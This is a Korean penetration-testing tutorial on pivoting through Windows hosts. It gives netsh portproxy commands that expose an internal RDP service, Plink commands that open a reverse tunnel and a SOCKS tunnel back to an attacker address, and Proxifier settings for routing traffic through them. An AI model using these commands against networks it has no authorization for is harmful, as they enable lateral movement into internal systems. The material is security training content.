hhkb
모의해킹

피버팅과터널링_11_윈도우 피버팅 도구

작성자 : Heehyeon Yoo|2025-12-20
# 모의해킹# PNT# Windows# netsh# Plink

1. 개요

윈도우 환경이 피벗 호스트이거나 공격자의 운영체제가 윈도우인 경우, 리눅스와는 다른 도구와 전략이 필요하다. 본 문서에서는 윈도우 기본 쉘 명령어인 netsh, SSH 클라이언트인 Plink, 그리고 GUI 기반 프록시 도구인 Proxifier의 활용법을 정리한다.

2. Netsh: 윈도우 네이티브 포트 포워딩

netsh는 별도의 툴 설치 없이 윈도우에 내장된 기능만으로 포트 포워딩을 수행할 수 있어 매우 유용하다(Living off the Land).

2.1 포트 포워딩 설정 (PortProxy)

다음 명령어는 피벗 호스트의 특정 포트(listenport)로 들어오는 트래픽을 타겟 호스트의 포트(connectport)로 전달한다. (반드시 관리자 권한 CMD 필요)

netsh interface portproxy add v4tov4 listenport=4444 listenaddress=0.0.0.0 connectport=3389 connectaddress=10.1.20.20
  • listenport=4444: 피벗 호스트에서 열릴 포트.
  • listenaddress=0.0.0.0: 모든 인터페이스에서 수신 (외부 접근 허용).
  • connectaddress=10.1.20.20: 트래픽을 전달할 내부망 타겟 IP.
  • connectport=3389: 타겟 서비스 포트 (예: RDP).

2.2 확인 및 삭제

# 설정 확인
netsh interface portproxy show all

# 설정 삭제
netsh interface portproxy delete v4tov4 listenport=4444 listenaddress=0.0.0.0

주의: netsh 포트 포워딩이 동작하려면 피벗 호스트의 방화벽에서 listenport에 대한 인바운드 허용 규칙이 필요하다.

3. Plink.exe: 윈도우용 CLI SSH 클라이언트

Plink(PuTTY Link)는 ssh 명령어가 없는 구형 윈도우 시스템에서 SSH 터널링을 수행하기 위해 사용되는 도구이다. 리눅스의 ssh 명령어와 옵션이 거의 유사하다.

3.1 주요 옵션 및 사용법

# 일반적인 리모트 포트 포워딩 (RDP 예시)
plink.exe -l [User] -pw [Password] -R 3389:127.0.0.1:3389 [AttackerIP]

# 다이나믹 포트 포워딩 (SOCKS 프록시 생성)
plink.exe -l [User] -pw [Password] -D 1080 [PivotHost]
  • -l: 사용자명 지정.
  • -pw: 패스워드 지정 (자동화에 유리).
  • 최신 윈도우 10/11은 OpenSSH Client가 내장되어 있어 ssh를 바로 사용하면 되지만, 피벗 호스트가 구형 서버(Windows Server 2012 등)일 경우 Plink를 업로드하여 사용한다.

4. Proxifier: 윈도우용 ProxyChains

Proxifier는 윈도우의 GUI 애플리케이션(웹 브라우저, RDP 클라이언트, DB 관리 도구 등)이 SOCKS 프록시를 경유하도록 강제하는 도구이다. 리눅스의 proxychains에 해당하는 강력한 상용 소프트웨어이다.

4.1 기본 설정

  1. Proxy Server 추가:

    • Profile -> Proxy Servers 메뉴에서 Add 클릭.
    • Address: 127.0.0.1, Port: 1080 (SSH/Plink로 생성한 SOCKS 포트).
    • Protocol: SOCKS Version 5.
  2. Proxification Rules 설정:

    • Profile -> Proxification Rules 메뉴.
    • localhost 루프백 트래픽은 Direct로 설정(무한 루프 방지).
    • 특정 애플리케이션(mstsc.exe, firefox.exe)이나 타겟 IP 대역(10.1.20.*)에 대해 위에서 추가한 Proxy SOCKS5 127.0.0.1을 경유하도록 규칙(Action)을 지정.

4.2 동작 확인

설정 완료 후 RDP(mstsc.exe)를 실행하여 내부망 IP(10.1.20.20)로 접속을 시도하면, Proxifier 로그 창에서 해당 연결이 SOCKS 프록시를 통해 라우팅되는 것을 확인할 수 있다.